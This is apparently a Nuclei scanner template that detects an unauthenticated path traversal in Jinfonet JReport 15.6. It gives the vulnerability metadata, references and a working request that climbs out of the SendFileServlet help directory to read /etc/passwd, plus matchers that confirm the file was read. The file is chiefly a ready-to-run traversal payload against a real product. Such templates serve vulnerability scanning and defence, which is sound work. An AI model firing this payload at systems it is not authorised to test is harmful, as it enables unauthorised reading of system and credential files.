id: jinfornet-jreport-lfi

info:
  name: Jinfornet Jreport 15.6 - Unauthenticated Directory Traversal
  author: 0x_Akoko
  severity: high
  description: Jreport Help function have a path traversal vulnerability in the SendFileServlet allows remote unauthenticated users to view any files on the Operating System with Application services user permission.
    This vulnerability affects Windows and Unix operating systems.
  reference:
    - https://cxsecurity.com/issue/WLB-2020030151
    - https://www.jinfonet.com/product/download-jreport/
  tags: jreport,jinfornet,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200